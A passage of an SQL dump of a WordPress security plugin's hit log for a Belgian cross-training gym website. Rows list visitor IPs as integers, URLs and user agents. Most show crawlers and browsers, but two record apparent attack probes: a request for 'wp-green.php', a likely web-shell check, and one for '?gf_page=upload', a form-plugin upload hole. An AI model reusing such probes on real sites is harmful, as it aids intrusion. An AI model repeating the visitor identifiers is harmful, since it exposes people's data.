(69445, 1492281866.709360, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69446, 1492281867.231128, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69447, 1492281867.755315, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69448, 1492281868.353030, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69449, 1492286166.481386, 3475901846, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69450, 1492286506.404340, 1055603543, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', 'https://www.google.be', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69451, 1492286677.636579, 1055603543, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', 'https://www.google.be', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69452, 1492286678.442110, 1055603543, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69453, 1492286707.548891, 1055603543, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/266-2/', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69454, 1492286824.161055, 1055603543, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69455, 1492286925.831434, 1055603543, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69456, 1492286959.213340, 1055603543, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69457, 1492286965.101065, 1055603543, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69458, 1492286965.263013, 1055603543, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69459, 1492287065.368344, 1055603543, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69460, 1492287067.341941, 1055603543, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69461, 1492287093.259048, 1055603543, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69462, 1492287105.981564, 1055603543, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69463, 1492289825.478503, 1123634273, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69464, 1492290923.877838, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(69465, 1492293123.979873, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(69466, 1492293800.033770, 872290251, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-green.php', 'http://www.crossfitoswestry.com/blog//wp-green.php', 'Mozilla/4.0 (compatible  MSIE 8.0  Windows NT 5.1  Trident/4.0  WebMoney Advisor  .NET CLR 1.1.4322  .NET CLR 3.0.4506.2152  .NET CLR 3.5.30729  .NET CLR 2.0.50727)'),
(69467, 1492294105.242788, 1123634273, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69468, 1492294211.600134, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(69469, 1492314297.226012, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(69470, 1492314300.250381, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(69471, 1492320231.076107, 1570674729, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69472, 1492320231.618584, 100662546, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69473, 1492320234.415938, 2366145539, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69474, 1492320240.082692, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(69475, 1492322219.405187, 3475901912, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69476, 1492341292.580279, 1055599009, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69477, 1492341293.695155, 1055599009, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69478, 1492342291.787419, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69479, 1492342292.308136, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69480, 1492342292.809373, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69481, 1492342293.274221, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69482, 1492342293.718451, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69483, 1492342294.155808, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69484, 1492342294.667518, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69485, 1492342295.165651, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69486, 1492342295.626886, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69487, 1492342296.275840, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69488, 1492342296.706298, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69489, 1492343282.196439, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69490, 1492343282.992048, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69491, 1492343283.694784, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69492, 1492343284.199502, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69493, 1492343284.670924, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69494, 1492343285.117555, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69495, 1492343285.714720, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69496, 1492343286.220605, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69497, 1492343286.749906, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69498, 1492343287.235585, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69499, 1492343287.751171, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69500, 1492348564.741462, 3024883600, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(69501, 1492348564.742134, 3024883602, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(69502, 1492348588.905290, 3024883606, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(69503, 1492349979.640103, 676177792, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69504, 1492349980.092211, 676177792, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69505, 1492353522.326333, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69506, 1492353523.090811, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69507, 1492353523.518414, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69508, 1492353523.951640, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69509, 1492353524.402196, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69510, 1492353524.850391, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69511, 1492353525.339319, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69512, 1492353525.782875, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69513, 1492353526.775251, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69514, 1492353527.205326, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69515, 1492353527.732153, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69516, 1492355941.390782, 1538566999, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(69517, 1492355949.135030, 1538566999, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69518, 1492355950.476026, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69519, 1492355950.883734, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69520, 1492355951.934909, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69521, 1492355952.336458, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69522, 1492355952.760772, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69523, 1492355953.314515, 1538566999, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(69524, 1492355953.707346, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69525, 1492355954.098263, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69526, 1492355954.515568, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69527, 1492355954.963842, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69528, 1492355955.489049, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69529, 1492355955.913382, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69530, 1492359674.085036, 1837489426, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(69531, 1492362509.129542, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69532, 1492362509.761802, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69533, 1492362510.496947, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69534, 1492362510.996274, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69535, 1492362511.445761, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69536, 1492362511.870553, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69537, 1492362512.494509, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69538, 1492362512.966109, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69539, 1492362513.395405, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69540, 1492362513.845402, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69541, 1492362514.320015, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69542, 1492365438.824119, 2637637400, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69543, 1492367000.468039, 1538566999, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(69544, 1492367000.972872, 1538566999, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69545, 1492367001.418152, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69546, 1492367001.835177, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69547, 1492367002.335672, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69548, 1492367002.743603, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(69549, 1492367003.192322, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69550, 1492367005.495118, 1538566999, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(69551, 1492367005.900204, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69552, 1492367006.925653, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69553, 1492367007.583840, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69554, 1492367009.116215, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69555, 1492367010.011733, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69556, 1492367011.010803, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69557, 1492368219.038297, 1837489426, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(69558, 1492369234.899535, 876229871, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)'),
(69559, 1492369237.839883, 876229871, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)'),
(69560, 1492370506.087985, 1055613552, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69561, 1492370511.642897, 1055613552, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69562, 1492372576.961070, 1055613552, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://outlook.live.com/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G925F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69563, 1492372579.158034, 1055613552, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G925F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69564, 1492373629.523241, 1538379759, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),
(69565, 1492374287.047630, 3155896840, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/?gf_page=upload', 'http://www.crosstrainingcenter.be/?gf_page=upload', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(69566, 1492375498.798027, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69567, 1492375499.368416, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69568, 1492375499.837404, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
